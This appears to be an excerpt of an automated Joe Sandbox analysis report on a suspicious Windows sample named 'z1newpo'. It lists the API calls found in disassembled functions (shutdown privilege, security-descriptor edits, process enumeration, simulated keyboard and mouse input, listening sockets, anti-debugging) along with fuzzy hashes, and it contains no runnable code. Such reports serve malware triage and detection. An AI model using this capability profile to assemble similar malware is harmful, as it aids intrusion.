                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                    • String ID: :$\$\??\%s
                                                    • API String ID: 2192556992-3457252023
                                                    • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                    • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                    • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                    • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                    APIs
                                                    • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                    • __swprintf.LIBCMT ref: 004722B9
                                                    • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                    • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                    • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                    • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                    • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                    • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                    • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                    • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                    • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: FolderPath$LocalTime__swprintf
                                                    • String ID: %.3d
                                                    • API String ID: 3337348382-986655627
                                                    • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                    • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                    • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                    • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                    • FindClose.KERNEL32(00000000), ref: 0044291C
                                                    • FindClose.KERNEL32(00000000), ref: 00442930
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                    • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                    • FindClose.KERNEL32(00000000), ref: 004429D4
                                                      • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                    • FindClose.KERNEL32(00000000), ref: 004429E2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                    • String ID: *.*
                                                    • API String ID: 2640511053-438819550
                                                    • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                    • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                    • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                    • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                    • GetLastError.KERNEL32 ref: 00433414
                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                    • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                    • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                    • String ID: SeShutdownPrivilege
                                                    • API String ID: 2938487562-3733053543
                                                    • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                    • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                    • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                    • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                    APIs
                                                      • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                      • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                      • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                      • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                    • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                    • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                    • CopySid.ADVAPI32(00000000), ref: 00446271
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                    • String ID:
                                                    • API String ID: 1255039815-0
                                                    • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                    • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                    • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                    • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                    APIs
                                                    • __swprintf.LIBCMT ref: 00433073
                                                    • __swprintf.LIBCMT ref: 00433085
                                                    • __wcsicoll.LIBCMT ref: 00433092
                                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                    • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                    • LockResource.KERNEL32(00000000), ref: 004330CA
                                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                    • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                    • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                    • LockResource.KERNEL32(?), ref: 00433120
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                    • String ID:
                                                    • API String ID: 1158019794-0
                                                    • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                    • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                    • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                    • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                    • String ID:
                                                    • API String ID: 1737998785-0
                                                    • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                    • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                    • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                    • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                    • GetLastError.KERNEL32 ref: 0045D6BF
                                                    • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                    • API String ID: 4194297153-14809454
                                                    • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                    • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                    • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                    • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmove$_strncmp
                                                    • String ID: @oH$\$^$h
                                                    • API String ID: 2175499884-3701065813
                                                    • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                    • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                    • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                    • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                    APIs
                                                    • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                    • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                    • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                                    • String ID:
                                                    • API String ID: 540024437-0
                                                    • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                    • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                    • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                    • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                    • API String ID: 0-2872873767
                                                    • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                    • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                    • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                    • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                    • __wsplitpath.LIBCMT ref: 00475644
                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                    • _wcscat.LIBCMT ref: 00475657
                                                    • __wcsicoll.LIBCMT ref: 0047567B
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                    • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                    • String ID:
                                                    • API String ID: 2547909840-0
                                                    • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                    • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                    • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                    • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                    APIs
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                    • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                    • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                    • FindClose.KERNEL32(?), ref: 004525FF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                    • String ID: *.*$\VH
                                                    • API String ID: 2786137511-2657498754
                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                    • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                    • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                    • String ID: pqI
                                                    • API String ID: 2579439406-2459173057
                                                    APIs
                                                    • __wcsicoll.LIBCMT ref: 00433349
                                                    • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                    • __wcsicoll.LIBCMT ref: 00433375
                                                    • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __wcsicollmouse_event
                                                    • String ID: DOWN
                                                    • API String ID: 1033544147-711622031
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                    • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                    • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                    • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                    • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: KeyboardMessagePostState$InputSend
                                                    • String ID:
                                                    • API String ID: 3031425849-0
                                                    APIs
                                                      • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                    • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 4170576061-0
                                                    APIs
                                                      • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                    • IsWindowVisible.USER32 ref: 0047A368
                                                    • IsWindowEnabled.USER32 ref: 0047A378
                                                    • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                    • IsIconic.USER32 ref: 0047A393
                                                    • IsZoomed.USER32 ref: 0047A3A1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                    • String ID:
                                                    • API String ID: 292994002-0
                                                    APIs
                                                      • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                    • CoInitialize.OLE32(00000000), ref: 00478442
                                                    • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                    • CoUninitialize.OLE32 ref: 0047863C
                                                    Strings
                                                    Memory Dump Source
